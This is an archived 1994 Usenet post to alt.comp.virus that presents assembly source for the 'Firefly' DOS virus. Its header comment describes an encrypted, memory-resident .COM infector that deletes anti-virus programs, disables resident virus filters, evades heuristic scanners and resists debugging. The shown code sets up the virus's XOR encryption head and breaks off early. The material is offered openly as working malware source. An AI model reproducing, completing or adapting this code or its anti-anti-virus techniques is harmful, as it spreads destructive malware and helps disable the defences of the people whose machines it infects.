home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / ASM-F.ZIP / FIREFLY.ASM < prev    next >
Assembly Source File  |  1994-11-29  |  3KB  |  76 lines
  1. From netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!geraldo.cc.utexas.edu!axpvms.cc.utexas.edu!HALFLIFE Tue Nov 29 09:56:01 1994
  2. Xref: netcom.com alt.comp.virus:491
  3. Path: netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!geraldo.cc.utexas.edu!axpvms.cc.utexas.edu!HALFLIFE
  4. From: halflife@axpvms.cc.utexas.edu
  5. Newsgroups: alt.comp.virus
  6. Subject: Firefly virus
  7. Date: 28 Nov 1994 08:51:37 GMT
  8. Organization: University of Texas @ Austin
  9. Lines: 61
  10. Message-ID: <3bc5mq$p63@geraldo.cc.utexas.edu>
  11. Reply-To: halflife@axpvms.cc.utexas.edu
  12. NNTP-Posting-Host: axpvms.cc.utexas.edu
  13.  
  14. ;FIREFLY virus, by Nikademus.                
  15. ;
  16. ;Firefly is an encrypted, memory resident virus which infects
  17. ;.COMfiles on load.  It incorporates code from Proto-T, 
  18. ;LokJaw and YB-X viruses and, when in memory, attacks a large selection
  19. ;of anti-virus programs as they are executed.  Anti-virus programs
  20. ;identified by Firefly's execute/load handler are deleted.
  21. ;Firefly incorporates simple code from previous issues of the newsletter
  22. ;designed to de-install generic VSAFE resident virus activity
  23. ;filters designed for Microsoft by Central Point Software.  It
  24. ;contains instructions - specifically a segment of pseudo-nested 
  25. ;loops - which spoof F-Protect's expert system generic virus
  26. ;identification feature.
  27. ;
  28. ;FIREFLY also includes a visual marker tied to the system timer
  29. ;tick interrupt (1Ch) which slowly cycles the NumLock, CapsLock
  30. ;and ScrollLock LEDs on the keyboard.  This produces a noticeable
  31. ;twinkling effect when the virus is active on a machine.
  32. ;
  33. ;Anti-anti-virus measures used by Firefly vary in effectiveness
  34. ;dependent upon how a user employs software.  For example, while
  35. ;Firefly is designed to delete the Victor Charlie anti-virus
  36. ;shell, VC.EXE, a user who employs the software packages utilities
  37. ;for generic virus detection singly, will not be interfered with
  38. ;by the virus. Your results may vary, but the virus does effectively
  39. ;delete anti-virus programs while in memory unless steps are taken
  40. ;beforehand to avoid this.
  41. ;
  42. ;Firefly incorporates minor code armoring techniques designed to thwart
  43. ;trivial debugging.
  44.  
  45.                 
  46.                 
  47.                 .radix 16
  48.      code       segment
  49.                 model  small
  50.                 assume cs:code, ds:code, es:code
  51.  
  52.                 org 100h
  53.  
  54. len             equ offset last - start
  55. vir_len         equ len / 16d                    ; 16 bytes per paragraph 
  56. encryptlength   equ (last - begin)/4+1
  57.  
  58.  
  59.  
  60. start:
  61.                 mov bx, offset begin        ; The Encryption Head
  62.                 mov cx, encryptlength       ;
  63. encryption_loop:                            ;
  64.                 db      81h                 ; XOR WORD PTR [BX], ????h
  65.                 db      37h                 ;
  66. encryption_value_1:                         ;
  67.                 dw      0000h               ;
  68.                                             ;
  69.                 db      81h                 ; XOR WORD PTR [BX+2], ????h
  70.                 db      77h                 ;
  71.                 db      02h                 ; 2 different random words
  72. encryption_value_2:                         ; give 32-bit encryption
  73.                 dw      0000h               ;
  74.                 add     bx, 4               ;
  75.  
  76.